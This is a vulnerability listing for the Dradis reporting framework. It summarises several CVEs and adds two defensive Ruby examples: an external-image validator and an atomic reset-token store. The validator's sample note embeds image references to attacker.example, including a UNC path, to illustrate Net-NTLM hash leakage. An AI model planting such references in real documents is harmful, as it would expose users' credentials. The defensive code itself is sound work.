
CVSS: 3.5 | EPSS: 0% | CPEs: 1 | EXPL: 0

10 Jul 2025 — In Dradis before 4.11.0, the Output Console shows a job queue that may contain information about other users' jobs. • https://github.com/dradis/dradis-ce/tags • CWE-1230: Exposure of Sensitive Information Through Metadata •

CVSS: 4.1 | EPSS: 0% | CPEs: 1 | EXPL: 0

05 Jul 2025 — Dradis through 4.16.0 allows referencing external images (resources) over HTTPS, instead of forcing the use of embedded (uploaded) images. This can be leveraged by an authorized author to attempt to steal the Net-NTLM hashes of other authors on a Windows domain network. • https://dradis.com • CWE-294: Authentication Bypass by Capture-replay •
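The fix described above is to refuse image sources that are not uploaded attachments, because a Windows client rendering an image from an attacker-controlled host (an HTTP host in the intranet zone, or a UNC path) will offer Net-NTLM credentials to that host. The check below is an added example, not Dradis code: it assumes Textile-style image markup (`!source!` or `!source(alt)!`) and that uploaded images live under a relative `/attachments/` path; both are assumptions about the markup, not facts from the advisory.

```ruby
# Added example (not from the Dradis project): find image references in a
# note whose source is not an uploaded attachment. Assumes Textile-style
# image markup and a relative /attachments/ prefix for uploaded images.
require 'uri'

# Textile image syntax: !source! or !source(alt text)!  (assumed markup)
IMAGE_REF = /!([^!\s()]+)(?:\([^)]*\))?!/

# A source is internal only if it has no scheme, no host, and points at the
# application's own attachment route. UNC paths (\\host\share\img.png) and
# protocol-relative URLs (//host/img.png) are rejected before URI parsing,
# since both make a Windows client authenticate to the remote host.
def internal_source?(src)
  return false if src.start_with?('\\\\') || src.start_with?('//')
  uri = URI.parse(src)
  uri.scheme.nil? && uri.host.nil? && src.start_with?('/attachments/')
rescue URI::InvalidURIError
  false
end

# Returns every image source in +content+ that should be refused on save.
def external_image_refs(content)
  content.scan(IMAGE_REF).flatten.reject { |src| internal_source?(src) }
end

# Constructed sample note: one legitimate upload, two external references.
SAMPLE = <<~TEXTILE
  Screenshot of the finding:
  !/attachments/screenshot.png!
  External logo (leaks Net-NTLM to the remote host when rendered by a Windows client):
  !https://attacker.example/logo.png(logo)!
  !\\\\attacker.example\\share\\pixel.png!
TEXTILE

if __FILE__ == $PROGRAM_NAME
  external_image_refs(SAMPLE).each { |src| puts "refused external image: #{src}" }
end
```

Running the check server-side on every save (rather than only in the editor) matters here, because the attacker in this scenario is an authenticated author who can post content through the API as well as the UI.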

CVSS: 8.7 | EPSS: 0% | CPEs: 1 | EXPL: 0

25 Apr 2023 — Dradis before 4.8.0 allows persistent XSS by authenticated author users, related to avatars. • https://dradisframework.com/ce/security_reports.html#fixed-4.8.0 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVSS: 5.9 | EPSS: 0% | CPEs: 1 | EXPL: 0

24 Jun 2022 — Dradis Professional Edition before 4.3.0 allows attackers to change an account password by reusing a password reset token. • https://dradisframework.com/ce/security_reports.html • CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') •
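The CWE-362 classification above points at the usual shape of a reset-token reuse bug: the token is validated in one step and invalidated in a later one, so concurrent requests carrying the same token can all pass the check. The following is an added example, not Dradis code, showing the pattern that closes that window: the check and the invalidation happen as a single operation under a lock, so of any number of concurrent reset attempts exactly one can succeed. The in-memory store is a stand-in for whatever persistence the application uses.

```ruby
# Added example (not from the Dradis project): single-use password reset
# tokens whose check-and-invalidate step is atomic, so concurrent requests
# with the same token cannot all succeed. The Hash-backed store stands in
# for a database table; the same property is needed there (e.g. a single
# UPDATE ... WHERE token = ? AND used_at IS NULL).
require 'securerandom'
require 'digest'

class ResetTokenStore
  def initialize
    @tokens = {}        # SHA-256(token) => account id
    @lock = Mutex.new
  end

  # Issue a fresh random token; only its digest is stored, so a database
  # read does not yield a usable token.
  def issue(account_id)
    raw = SecureRandom.urlsafe_base64(32)
    @lock.synchronize { @tokens[Digest::SHA256.hexdigest(raw)] = account_id }
    raw
  end

  # Returns the account id on first use and nil on every later use.
  # delete under the lock is the check and the invalidation in one step.
  def consume(raw)
    @lock.synchronize { @tokens.delete(Digest::SHA256.hexdigest(raw)) }
  end
end

# Fire +attempts+ concurrent resets with the same token and count how many
# were accepted. With the atomic store the answer is always 1.
def concurrent_resets(store, raw, attempts: 20)
  threads = attempts.times.map { Thread.new { store.consume(raw) } }
  threads.map(&:value).compact.size
end

if __FILE__ == $PROGRAM_NAME
  store = ResetTokenStore.new
  token = store.issue(42)
  puts "accepted resets: #{concurrent_resets(store, token)}"   # 1
end
```

The equivalent in a relational backend is to make the consumption a single conditional write and to treat "zero rows updated" as an invalid token, rather than a SELECT followed by a separate UPDATE.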

CVSS: 6.5 | EPSS: 0% | CPEs: 1 | EXPL: 1

16 Mar 2020 — The API in Dradis Pro 3.4.1 allows any user to extract the content of a project, even if this user is not part of the project team. • https://know.bishopfox.com/advisories • CWE-639: Authorization Bypass Through User-Controlled Key •

CVSS: 5.4 | EPSS: 0% | CPEs: 2 | EXPL: 0

12 Mar 2019 — Cross-site scripting vulnerability in Dradis Community Edition v3.11 and earlier and Dradis Professional Edition v3.1.1 and earlier allows remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors. • http://jvn.jp/en/jp/JVN40288903/index.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •